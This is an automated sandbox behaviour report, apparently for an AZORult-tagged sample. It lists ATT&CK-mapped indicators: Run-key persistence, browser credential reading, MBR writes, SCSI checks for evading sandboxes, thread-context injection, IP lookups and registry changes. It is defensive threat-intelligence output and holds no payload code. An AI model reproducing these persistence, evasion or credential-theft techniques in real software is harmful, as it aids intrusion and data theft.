azorult | 1bf6d14c4b5f59aa30882f4aa25e9e9d703dac905a785fe020ff667600e5fc97

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 20 IoCs

pid	Process
3884	Setup.exe
3884	Setup.exe
3884	Setup.exe
2624	MsiExec.exe
2328	0B44010BDDEFEFD3.exe
2328	0B44010BDDEFEFD3.exe
3336	MiniThunderPlatform.exe
3336	MiniThunderPlatform.exe
3336	MiniThunderPlatform.exe
3336	MiniThunderPlatform.exe
3336	MiniThunderPlatform.exe
3336	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2464	seed.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
412	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	hjjgaa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\e53c72c0-0784-423a-8049-005ad90d254b\\D5F0.exe\" --AutoStart"	D5F0.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg2_2qua.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	aliens.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0B44010BDDEFEFD3.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
59	ip-api.com
130	api.2ip.ua
131	api.2ip.ua
161	api.2ip.ua
179	checkip.amazonaws.com

Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	aliens.exe
File opened for modification	\??\PhysicalDrive0	0B44010BDDEFEFD3.exe
File opened for modification	\??\PhysicalDrive0	0B44010BDDEFEFD3.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2944	aliens.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2328 set thread context of 2840	2328	0B44010BDDEFEFD3.exe	112
PID 2328 set thread context of 3276	2328	0B44010BDDEFEFD3.exe	119
PID 2328 set thread context of 564	2328	0B44010BDDEFEFD3.exe	121
PID 2328 set thread context of 992	2328	0B44010BDDEFEFD3.exe	124

Drops file in Program Files directory 38 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\RearRips\is-DVKBV.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-JVLHF.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-HSQJG.tmp	1021C014A4C9A552.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade\Seed\seed.exe	seed.sfx.exe
File created	C:\Program Files (x86)\RearRips\images\is-7MSCP.tmp	1021C014A4C9A552.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade\Seed	seed.sfx.exe
File created	C:\Program Files (x86)\fjkw1lb5cxpb\__tmp_rar_sfx_access_check_259426546	setup.exe
File created	C:\Program Files (x86)\RearRips\images\is-JSALA.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-715AJ.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-TU2U5.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-VA7BP.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-F9EE7.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-A3442.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\lang\is-4QK7L.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-58MEK.tmp	1021C014A4C9A552.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade	seed.sfx.exe
File created	C:\Program Files (x86)\RearRips\images\is-CL6PE.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\lang\is-4GFJP.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe	setup.exe
File opened for modification	C:\Program Files (x86)\RearRips\DreamTrip.exe	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\unins000.dat	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-HIQ48.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-DOIT2.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-EG9Q5.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-FHGTG.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259521890	seed.sfx.exe
File opened for modification	C:\Program Files (x86)\fjkw1lb5cxpb	setup.exe
File opened for modification	C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe	setup.exe
File opened for modification	C:\Program Files (x86)\RearRips\seed.sfx.exe	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-S9NNH.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-KIBIV.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\Seed Trade\Seed\seed.exe	seed.sfx.exe
File opened for modification	C:\Program Files (x86)\RearRips\unins000.dat	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\is-BMSQP.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-V5CE1.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-EVH2F.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-3H7GO.tmp	1021C014A4C9A552.tmp
File created	C:\Program Files (x86)\RearRips\images\is-0I3LH.tmp	1021C014A4C9A552.tmp

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 15 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	0B44010BDDEFEFD3.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	0B44010BDDEFEFD3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	0B44010BDDEFEFD3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	0B44010BDDEFEFD3.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	0B44010BDDEFEFD3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	0B44010BDDEFEFD3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
560	taskkill.exe
3172	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 99918c35c5bdd601	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4afdc32fc5bdd601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "uozcqcm"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d51bf81ac5bdd601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000037fd74651f43afda71cd46c7881a1de12f6f736743bdd4c0fceeb377c8057d315fbd9db2a4a2b706dfce259b64d57affb2fd71287a3a80f8d684	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
